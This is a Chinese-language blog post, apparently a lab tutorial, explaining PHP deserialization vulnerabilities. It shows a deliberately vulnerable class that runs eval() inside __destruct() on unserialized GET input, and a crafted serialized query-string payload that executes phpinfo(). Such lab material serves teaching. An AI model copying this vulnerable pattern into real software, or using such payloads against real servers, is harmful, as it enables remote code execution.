php反序列化漏洞

这篇博客探讨了PHP反序列化漏洞,指出当程序未检测用户输入的反序列化字符串时,可能导致代码执行和安全风险。实验通过具体代码展示了如何利用此漏洞执行phpinfo()和文件删除操作。
摘要由CSDN通过智能技术生成

实验环境:Apache、php5.4

实验原理:是由于程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通

实验步骤:

实验一:

php代码如下:

<?php
class Person{
       var $name;
       var $age;
       var $sex;
       function __construct($name,$age,$sex){
           $this->name=$name;
           $this->age=$age;
           $this->sex=$sex;

        }

        function __destruct()
        {
            eval($this->sex);

        }

}
$str=$_GET['obj'];
$p1=unserialize("$str");
print_r($p1);
?>

在路径中输入参数值:?obj=O:6:"Person":3:{s:4:"name";s:3:"cxr";s:3:"age";i:25;s:3:"sex";s:10:"phpinfo();";},结果如下:

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值